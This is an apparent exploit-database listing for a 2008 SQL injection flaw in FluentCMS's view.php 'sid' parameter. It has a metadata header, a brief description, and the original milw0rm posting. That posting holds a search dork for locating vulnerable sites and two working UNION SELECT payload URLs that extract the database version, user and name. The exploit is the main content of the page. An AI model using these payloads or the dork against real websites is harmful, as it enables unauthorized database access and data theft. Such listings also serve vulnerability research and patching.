header-logo
Suggest Exploit
vendor:
FluentCMS
by:
cO2 [ Algeria Security Crew ]
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FluentCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FluentCMS Remote Sql Inj. Vuln.

A vulnerability exists in FluentCMS which allows an attacker to inject arbitrary SQL commands. This can be exploited to gain access to the database and potentially gain access to sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'sid' parameter in 'view.php'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation requires that magic_quotes_gpc is disabled.

Mitigation:

Ensure that magic_quotes_gpc is enabled.
Source

Exploit-DB raw data:

###################################################
[~] FluentCMS Remote Sql İnj. Vuln.
                                                                                                              
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Speacial thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-27]